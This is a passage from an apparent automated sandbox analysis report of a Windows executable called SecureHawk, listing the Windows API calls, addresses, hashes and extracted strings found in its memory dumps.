                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __i64tow__itow__swprintf
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 421087845-2263619337
                                  • Opcode ID: 4aaee810aa3ab3b360720cd86d589d919b580dba10173b360a3841dbefd8524a
                                  • Instruction ID: 586609ae3b720303f49cfbfc91a34d05fdc31d3d772b60c41d677d9a0db0aa46
                                  • Opcode Fuzzy Hash: 4aaee810aa3ab3b360720cd86d589d919b580dba10173b360a3841dbefd8524a
                                  • Instruction Fuzzy Hash: 6A41EC71514219AFDB29EF74D842EB7B3E8EF49340F20446EF549DB291EAB1D981CB10
                                  APIs
                                  • _memset.LIBCMT ref: 00377557
                                  • CreateMenu.USER32 ref: 00377572
                                  • SetMenu.USER32(?,00000000), ref: 00377581
                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037760E
                                  • IsMenu.USER32(?), ref: 00377624
                                  • CreatePopupMenu.USER32 ref: 0037762E
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0037765B
                                  • DrawMenuBar.USER32 ref: 00377663
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                  • String ID: 0$F
                                  • API String ID: 176399719-3044882817
                                  • Opcode ID: 23f475fbfaa0e06de80ac0a2439f4d1b9a62159bf8f085b6951174d85e0dfd5e
                                  • Instruction ID: 8bb2d2a252080ce4738da9c6e9bbddedf878e5f5c8fc3eb92cdb755c61a9402d
                                  • Opcode Fuzzy Hash: 23f475fbfaa0e06de80ac0a2439f4d1b9a62159bf8f085b6951174d85e0dfd5e
                                  • Instruction Fuzzy Hash: FE418B79A04209EFDB22DF68D884BDABBB9FF09340F154069F90997360D734A914CFA0
                                  APIs
                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0037794B
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00377952
                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00377965
                                  • SelectObject.GDI32(00000000,00000000), ref: 0037796D
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00377978
                                  • DeleteDC.GDI32(00000000), ref: 00377981
                                  • GetWindowLongW.USER32(?,000000EC), ref: 0037798B
                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0037799F
                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003779AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                  • String ID: static
                                  • API String ID: 2559357485-2160076837
                                  • Opcode ID: a23bc2f450dca2628d8f7696728df25b4a9381dc6f18c10362913e7de6900987
                                  • Instruction ID: aa7df3c04c9250f804b8681a48de85f1505e5ed83d42bac26cd748eaa87dac14
                                  • Opcode Fuzzy Hash: a23bc2f450dca2628d8f7696728df25b4a9381dc6f18c10362913e7de6900987
                                  • Instruction Fuzzy Hash: D631AA32105219ABDF269F64DC09FEA3B6DEF0A320F114214FA59A60A0D735D824DBA4
                                  APIs
                                  • _memset.LIBCMT ref: 00316F9B
                                    • Part of subcall function 00318C88: __getptd_noexit.LIBCMT ref: 00318C88
                                  • __gmtime64_s.LIBCMT ref: 00317034
                                  • __gmtime64_s.LIBCMT ref: 0031706A
                                  • __gmtime64_s.LIBCMT ref: 00317087
                                  • __allrem.LIBCMT ref: 003170DD
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003170F9
                                  • __allrem.LIBCMT ref: 00317110
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0031712E
                                  • __allrem.LIBCMT ref: 00317145
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00317163
                                  • __invoke_watson.LIBCMT ref: 003171D4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                  • String ID:
                                  • API String ID: 384356119-0
                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                  • Instruction ID: d6621db3d2ca959d40680c9effbe4be6f459e86d6815bcad3abaa4aa18a5f2e7
                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                  • Instruction Fuzzy Hash: AB71F872A00716BBD71A9F78DC42BDAB3B8AF09720F184239F514DB681E774D9818BD0
                                  APIs
                                  • _memset.LIBCMT ref: 00352B55
                                  • GetMenuItemInfoW.USER32(003B6890,000000FF,00000000,00000030), ref: 00352BB6
                                  • SetMenuItemInfoW.USER32(003B6890,00000004,00000000,00000030), ref: 00352BEC
                                  • Sleep.KERNEL32(000001F4), ref: 00352BFE
                                  • GetMenuItemCount.USER32(?), ref: 00352C42
                                  • GetMenuItemID.USER32(?,00000000), ref: 00352C5E
                                  • GetMenuItemID.USER32(?,-00000001), ref: 00352C88
                                  • GetMenuItemID.USER32(?,?), ref: 00352CCD
                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00352D13
                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00352D27
                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00352D48
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                  • String ID:
                                  • API String ID: 4176008265-0
                                  • Opcode ID: 898dcf35ea42234d32e188fc6121cf084397f5124f232629698e1652b3b7a70f
                                  • Instruction ID: eff8af30cfdeaf523f480e9b5f3807297d46751b524b2e2c5473892c1347e48d
                                  • Opcode Fuzzy Hash: 898dcf35ea42234d32e188fc6121cf084397f5124f232629698e1652b3b7a70f
                                  • Instruction Fuzzy Hash: 5C61A0B1900249AFDF16CF64DC88DBF7BB8EB42305F150559EC11A7261D771AD49DB20
                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00377392
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00377395
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003773B9
                                  • _memset.LIBCMT ref: 003773CA
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003773DC
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00377454
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow_memset
                                  • String ID:
                                  • API String ID: 830647256-0
                                  • Opcode ID: 9f69d2a574742e6d529e97006d3753c6163c6032f4cb2732f7ca4d110c492c34
                                  • Instruction ID: caf571ad1399d14b27383f00dc7d7c77ce205033ef5be678ccbff8f5e46df4e7
                                  • Opcode Fuzzy Hash: 9f69d2a574742e6d529e97006d3753c6163c6032f4cb2732f7ca4d110c492c34
                                  • Instruction Fuzzy Hash: FE617C75900208AFDB22DFA4CC81EEE77F8EB09714F144159FA19E72A2C778AD45DB90
                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003475C0
                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00347619
                                  • VariantInit.OLEAUT32(?), ref: 0034762B
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0034764B
                                  • VariantCopy.OLEAUT32(?,?), ref: 0034769E
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 003476B2
                                  • VariantClear.OLEAUT32(?), ref: 003476C7
                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 003476D4
                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003476DD
                                  • VariantClear.OLEAUT32(?), ref: 003476EF
                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003476FA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 748ef01d895ad878773da76bbc434bc684840c002e856fb314cead0193c9c18b
                                  • Instruction ID: 6ea1471382eef6ee4fe20ca33a19b237ed5de0d05d42197dbf17afd3d2588d61
                                  • Opcode Fuzzy Hash: 748ef01d895ad878773da76bbc434bc684840c002e856fb314cead0193c9c18b
                                  • Instruction Fuzzy Hash: 81416335A002199FCB06DFA9C844DADBBFDFF48354F018069EA55AB261CB70E945CF90
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0035039C
                                  • GetAsyncKeyState.USER32(000000A0), ref: 0035041D
                                  • GetKeyState.USER32(000000A0), ref: 00350438
                                  • GetAsyncKeyState.USER32(000000A1), ref: 00350452
                                  • GetKeyState.USER32(000000A1), ref: 00350467
                                  • GetAsyncKeyState.USER32(00000011), ref: 0035047F
                                  • GetKeyState.USER32(00000011), ref: 00350491
                                  • GetAsyncKeyState.USER32(00000012), ref: 003504A9
                                  • GetKeyState.USER32(00000012), ref: 003504BB
                                  • GetAsyncKeyState.USER32(0000005B), ref: 003504D3
                                  • GetKeyState.USER32(0000005B), ref: 003504E5
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: d322c50d50e3194a44cb0f853dbe408c79ace14cd9756b3b12c61da313b315a3
                                  • Instruction ID: 646666d9b436e81712c9d6b99e3af34171905793b2575a2056100838313c46c7
                                  • Opcode Fuzzy Hash: d322c50d50e3194a44cb0f853dbe408c79ace14cd9756b3b12c61da313b315a3
                                  • Instruction Fuzzy Hash: FD415C745487C96AFF3B87608404BB5BEA06F12301F094099DEC5465D2EBA649CCCF62
                                  APIs
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • CoInitialize.OLE32 ref: 003688B5
                                  • CoUninitialize.OLE32 ref: 003688C0
                                  • CoCreateInstance.OLE32(?,00000000,00000017,00383BBC,?), ref: 00368920
                                  • IIDFromString.OLE32(?,?), ref: 00368993
                                  • VariantInit.OLEAUT32(?), ref: 00368A2D
                                  • VariantClear.OLEAUT32(?), ref: 00368A8E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                  • API String ID: 834269672-1287834457
                                  • Opcode ID: 167f26eec86bb49c19620ba035bee5698b613f5f3dadee5b36e0b57abcddacf0
                                  • Instruction ID: 5e8595598100449fe679dc900df522c3bb17b6fc63b2e5bb0bfac88b2b9dbed1
                                  • Opcode Fuzzy Hash: 167f26eec86bb49c19620ba035bee5698b613f5f3dadee5b36e0b57abcddacf0
                                  • Instruction Fuzzy Hash: E9619E702087119FD712DF64C849B6EB7E8EF49754F008A5EF985AB291CB70ED48CB92
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0035B980
                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0035B9F6
                                  • GetLastError.KERNEL32 ref: 0035BA00
                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0035BA6D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Error$Mode$DiskFreeLastSpace
                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                  • API String ID: 4194297153-14809454
                                  • Opcode ID: abffdac7b27bcd934c9c84683a63a61686587a080bd075322976b7708809ad95
                                  • Instruction ID: 8183dd88e526d06b334553f14b94be65beae5f5f6ab7dab58258c9fc96884ceb
                                  • Opcode Fuzzy Hash: abffdac7b27bcd934c9c84683a63a61686587a080bd075322976b7708809ad95
                                  • Instruction Fuzzy Hash: 5C31A435A002099FCB02EF64DC95EFEF7B8EB45305F118166ED06DB2A1DB719949CB90
                                  APIs
                                  • LoadIconW.USER32(00000000,00007F03), ref: 003533E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconLoad
                                  • String ID: ,j;0j;$,j;0j;$blank$info$question$stop$warning
                                  • API String ID: 2457776203-1623967603
                                  • Opcode ID: 2c743f464151d3256126e28403fd278217e6d4d1f0d4df6ba2dcdb77bbfc0d1d
                                  • Instruction ID: 1a4f8c36fc508a833da66f20012f38f5023ed39def408de11d3d522f54543290
                                  • Opcode Fuzzy Hash: 2c743f464151d3256126e28403fd278217e6d4d1f0d4df6ba2dcdb77bbfc0d1d
                                  • Instruction Fuzzy Hash: D5115B75748306BAE70B4A159C43DEA77DCDF1A3A2B10401EFD01AE1D2DAB55F884160
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003499AF
                                  • GetDlgCtrlID.USER32 ref: 003499BA
                                  • GetParent.USER32 ref: 003499D6
                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 003499D9
                                  • GetDlgCtrlID.USER32(?), ref: 003499E2
                                  • GetParent.USER32(?), ref: 003499FE
                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00349A01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 1536045017-1403004172
                                  • Opcode ID: 39d205ec5d3761bf321b578dab7b39d03ddbced5207ea446e7985e2c4eca7fba
                                  • Instruction ID: 9053ab8e5ca93219593813cc432f46caa73e7107cc59b9aac07588ed8224e370
                                  • Opcode Fuzzy Hash: 39d205ec5d3761bf321b578dab7b39d03ddbced5207ea446e7985e2c4eca7fba
                                  • Instruction Fuzzy Hash: 8921A171A00204BFDF06AB60CC95AFEBBA9EF95300F100156F9619B2D1EB7598199B20
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00349A98
                                  • GetDlgCtrlID.USER32 ref: 00349AA3
                                  • GetParent.USER32 ref: 00349ABF
                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00349AC2
                                  • GetDlgCtrlID.USER32(?), ref: 00349ACB
                                  • GetParent.USER32(?), ref: 00349AE7
                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00349AEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 1536045017-1403004172
                                  • Opcode ID: 700cbe313aed181641b2c0dfff0bf363c67b7312e4b536dcc1ffb93b649621a3
                                  • Instruction ID: 7777529a3feaa3787396b4f7fe569458cc1b4762d795f705ab485ccd1197acd6
                                  • Opcode Fuzzy Hash: 700cbe313aed181641b2c0dfff0bf363c67b7312e4b536dcc1ffb93b649621a3
                                  • Instruction Fuzzy Hash: 1921C171A00208BFDB06EB60CC95EFEBBB9EF95300F000152F9519B291EB759819DB20
                                  APIs
                                  • GetParent.USER32 ref: 00349B0A
                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00349B1F
                                  • _wcscmp.LIBCMT ref: 00349B31
                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00349BAC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameParentSend_wcscmp
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 1704125052-3381328864
                                  • Opcode ID: 083e741edc8f211e4c570ac347799bf901125d174ef51fd7d8bb31f15543dd20
                                  • Instruction ID: 79401cb186648ed86c412cc61745695274013256fd68bd61166b062ecc666e76
                                  • Opcode Fuzzy Hash: 083e741edc8f211e4c570ac347799bf901125d174ef51fd7d8bb31f15543dd20
                                  • Instruction Fuzzy Hash: 5E11E376648306BAFA2B2A20EC06EF737DCDF19324F20005BF905B94E2FFA278544615
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 00368D89
                                  • CoInitialize.OLE32(00000000), ref: 00368DB6
                                  • CoUninitialize.OLE32 ref: 00368DC0
                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00368EC0
                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00368FED
                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00383BDC), ref: 00369021
                                  • CoGetObject.OLE32(?,00000000,00383BDC,?), ref: 00369044
                                  • SetErrorMode.KERNEL32(00000000), ref: 00369057
                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003690D7
                                  • VariantClear.OLEAUT32(?), ref: 003690E7
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                  • String ID:
                                  • API String ID: 2395222682-0
                                  • Opcode ID: 0c11718b71b55d4092b2843528d2f8fef14d188b7dbe8907501a2819740025a9
                                  • Instruction ID: 44d4151608f43c9536399f80fec886c3d4891216d45a09ee4436710bf6bb17aa
                                  • Opcode Fuzzy Hash: 0c11718b71b55d4092b2843528d2f8fef14d188b7dbe8907501a2819740025a9
                                  • Instruction Fuzzy Hash: B7C14771208305AFD701EF68C88492BB7E9FF89748F00895DF58A9B251DB71ED45CB92
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0035185B
                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003508D3,?,00000001), ref: 0035186F
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00351876
                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003508D3,?,00000001), ref: 00351885
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00351897
